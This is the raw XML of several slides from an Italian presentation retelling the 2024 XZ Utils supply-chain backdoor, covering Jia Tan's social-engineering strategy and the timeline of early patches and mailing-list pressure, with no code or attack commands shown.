              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73743" y="1849693"/>
            <a:ext cx="12115185" cy="273921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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cos'è successo?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A fine Marzo 2024, il mondo open-source è stato vittima di un attacco che punta principalmente alla supply chain dell'ecosistema Linux. Più nel dettaglio, è stata eseguita l'iniezione di una backdoor utilizzando come vettore la libreria XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, adottata più in generale da diversi sistemi Unix-like quali Linux, Mac e Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="24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54200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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, diagramma, Diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E0E269-4221-591C-07FA-6F321FBD07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7385" y="1786366"/>
            <a:ext cx="7477633" cy="5065315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74764ED6-ED53-C0E0-70AE-5FCCC4FB7B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276889" y="1993604"/>
            <a:ext cx="2392325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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analisi Kaspersky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19045043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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844" cy="42165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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan vuole diventare parte del progetto XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prima di ottenere un contatto con Lasse Collin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan ha lavorato su diversi progetti come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libarchive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libarchive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> così da incrementare la sua reputazione nella community.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passati dei mesi e raggiunto un certo numero di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, è iniziato uno scambio di messaggi sulla mailing list del progetto XZ.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan riuscirà a collaborare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> come autore di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> patches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>all'incirca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dalla versione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.2.5 e ad essere coinvolto nelle release dalla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> versione 5.4.0 alla 5.6.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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03427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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prima merge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di JiaT75</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3F52F4-5238-162F-E3D0-169B982089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0676" y="2624026"/>
            <a:ext cx="8090648" cy="4075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4763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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di JiaT75</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, numero, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9097E541-0F70-2867-667C-190CDE91AA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9045" y="2465224"/>
            <a:ext cx="8469085" cy="4257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7877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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5546727" cy="206210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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collaborazione col progetto XZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>29 Ottobre 2021: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan inizia a sottoporre patch innocue al progetto XZ attraverso la mailing list.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76819B67-F542-92E6-08CF-788D3B270D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8440" y="1580029"/>
            <a:ext cx="4735205" cy="5087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9771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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5921679" cy="206210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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collaborazione col progetto XZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7 Febbraio 2022: prima patch di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan viene accettata come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> da Lasse Collin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01DA5181-85E9-4F62-A7BD-E993CEDDD8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1444" y="1456267"/>
            <a:ext cx="5911111" cy="538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8107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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5764441" cy="427809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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Poliziotto buono vs poliziotto cattivo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22 Aprile 2022: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jigar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kumar si unisce alla mailing list. I suoi scambi sono per lo più piccole lamentele sulle funzionalità utente e sul supporto dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
